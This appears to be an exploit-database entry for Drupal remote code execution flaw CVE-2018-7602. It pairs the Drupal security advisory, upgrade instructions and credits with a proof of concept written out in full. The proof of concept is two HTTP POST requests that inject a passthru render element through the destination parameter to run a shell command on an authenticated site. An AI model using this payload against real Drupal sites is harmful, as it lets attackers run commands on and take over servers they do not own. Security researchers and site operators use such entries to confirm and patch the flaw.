Authors:Blaklis Risk：Critical CVE：CVE-2018-7602 0day:Remote Code Execution 0day -id:0DAY-176102 Date：2018-04-27
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
Updated — this vulnerability is being exploited in the wild.
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). POST /?q=node/99/delete&destination=node?q[%2523]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 [...] form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] Retrieve the form_build_id from the response, and then triggering the exploit with : POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 [...] form_build_id=[FORM_BUILD_ID] This will display the result of the whoami command. Patch your systems! Blaklis
Upgrade to the most recent version of Drupal 7 or 8 core.
- If you are running 7.x, upgrade to Drupal 7.59.
- If you are running 8.5.x, upgrade to Drupal 8.5.3.
- If you are running 8.4.x, upgrade to Drupal 8.4.8. (Drupal 8.4.x is no longer supported and we don’t normally provide security releases for unsupported minor releases. However, we are providing this 8.4.x release so that sites can update as quickly as possible. You should update to 8.4.8 immediately, then update to 8.5.3 or the latest secure release as soon as possible.)
If you are unable to update immediately, or if you are running a Drupal distribution that does not yet include this security release, you can attempt to apply the patch below to fix the vulnerability until you are able to update completely:
- David Rothstein of the Drupal Security Team
- xjm of the Drupal Security Team
- Samuel Mortenson of the Drupal Security Team
- Alex Pott of the Drupal Security Team
- Lee Rowlands of the Drupal Security Team
- Heine Deelstra of the Drupal Security Team
- Pere Orga of the Drupal Security Team
- Peter Wolanin of the Drupal Security Team
- Tim Plunkett
- Michael Hess of the Drupal Security Team
- Nate Lampton
- Jasper Mattsson
- Neil Drumm of the Drupal Security Team
- Cash Williams of the Drupal Security Team
- Daniel Wehner